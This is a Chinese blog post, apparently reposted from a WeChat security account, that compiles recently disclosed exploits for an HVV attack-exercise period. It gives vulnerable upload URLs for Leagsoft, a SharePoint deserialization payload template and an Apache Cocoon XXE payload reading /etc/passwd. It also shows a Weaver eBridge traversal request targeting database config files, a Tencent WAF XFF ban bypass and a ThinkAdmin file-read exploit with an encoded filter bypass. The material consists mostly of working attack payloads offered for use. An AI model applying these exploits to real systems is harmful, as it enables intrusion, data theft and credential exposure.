HVV近期漏洞持续跟踪ing

2021年4月25日07:54:28评论231 views字数 3704阅读12分20秒阅读模式

点击蓝字 关注我们

联软任意文件上传漏洞

已知存在漏洞的url如下：http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm（只有201904-1SP起才存在该漏洞）http://IP:80/uai/download/uploadfileToPath.htm（受影响的版本都存在该漏洞）http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/..;/..;/updateDevUploadinfo.htm（只有201904-1SP起才存在该漏洞）http://IP:80/uai/download/download/download/..;/..;/uploadfileToPath.htm （受影响的版本都存在该漏洞）

网瑞达资源访问控制系统命令执行漏洞

手工检测：使用普通账户登录进入主界面，在输入框中输入[email protected]:8860并点击立即跳转，跳转页面若包含pong字符串则存在漏洞。

Exchange Server 远程代码执行漏洞

前提：需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令
POC地址：https://srcincite.io/pocs/cve-2020-16875.py.txthttps://srcincite.io/pocs/cve-2020-16875.ps1.txt

SharePoint远程代码执行漏洞

1.使用ysoserial工具生成payload

HVV近期漏洞持续跟踪ing

2.将生成的payload拼接到poc

HVV近期漏洞持续跟踪ing

3.服务器iis主进程中启动了calc.exe

HVV近期漏洞持续跟踪ing

pox.xml

<DataSet>  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">    <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">      <xs:complexType>        <xs:choice minOccurs="0" maxOccurs="unbounded">          <xs:element name="Exp_x0020_Table">            <xs:complexType>              <xs:sequence>                <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>              </xs:sequence>            </xs:complexType>          </xs:element>        </xs:choice>      </xs:complexType>    </xs:element>  </xs:schema>  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">    <somedataset>      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">        <ExpandedElement/>        <ProjectedProperty0>            <MethodName>Deserialize</MethodName>            <MethodParameters>                <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">这里放payload</anyType>            </MethodParameters>            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>        </ProjectedProperty0>        </pwn>      </Exp_x0020_Table>    </somedataset>  </diffgr:diffgram></DataSet>

Apache Cocoon XML注入

漏洞利用条件有限必须是apacheCocoon且使用了StreamGenerator,也就是说只要传输的数据被解析就可以实现了。

<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]><userInfo><firstName>John</firstName> <lastName>&ent;</lastName></userInfo>

Horde Groupware Webmail Edition 远程命令执行

来源: https://srcincite.io/pocs/zdi-20-1051.py.txt

HVV近期漏洞持续跟踪ing

泛微云桥任意文件读取升级玩法

1、简单说说昨天泛微云桥的报告,输入文件路径->读取文件内容,我们读了一下代码后发现这还能读取文件目录。

2、参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏洞 “目录遍历”

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt

HVV近期漏洞持续跟踪ing

3、目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志、D盘迅雷下载。

d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.propertiesd:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库

HVV近期漏洞持续跟踪ing

腾讯云WAF中修改XFF头会导致IP封禁策略失效

攻击者真实IP被封禁的情况下，还是可以通过修改XFF头后继续对网站进行访问，即IP封禁措施会无效。

ThinkAdmin v6 未授权列目录/任意文件读取

参考：https://github.com/zoujingli/ThinkAdmin/issues/244

任意文件读取exp：http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node
POST:rules=["/"]也可以使用../来进行目录穿越：rules=["../../../"]

HVV近期漏洞持续跟踪ing

有一个允许的列表：
configpublic/staticpublic/router.phppublic/index.phpapp/adminapp/wechat
也就是说$name必须要不是database.php且要在允许列表内的文件才能够被读取，先绕过安全列表的限制，比如读取根目录的1.txt，只需要传入：
public/static/../../1.txt
而database.php的限制在Linux下应该是没办法绕过的，但是在Windows下可以透过"来替换.，也就是传入：
public/static/../../config/database"php
对应encode()后的结果为：
34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

HVV近期漏洞持续跟踪ing

本文始发于微信公众号（IDLab）：HVV近期漏洞持续跟踪ing

左青龙
微信扫一扫

右白虎
微信扫一扫

HVV近期漏洞持续跟踪ing

联软任意文件上传漏洞

网瑞达资源访问控制系统命令执行漏洞

Exchange Server 远程代码执行漏洞

SharePoint远程代码执行漏洞

Apache Cocoon XML注入

Horde Groupware Webmail Edition 远程命令执行

泛微云桥任意文件读取升级玩法

腾讯云WAF中修改XFF头会导致IP封禁策略失效

ThinkAdmin v6 未授权列目录/任意文件读取

windows-lsass转储篇

反将一军之黑产鼠的崛起

AppMsg一款适用于以APP病毒分析 APP漏洞挖掘辅助分析工具|漏洞挖掘

资产收集利器-ARL灯塔

乌克兰黑客活动分子声称入侵了俄罗斯无人机开发商Albatross

航空公司收集的个人隐私远超想象

Nacos 漏洞利用姿势大全

QoS特性详解

“火绒剑”独立版下载

实战 | 记某次逆向小程序解密及签名破解

发表评论

在线咨询

微信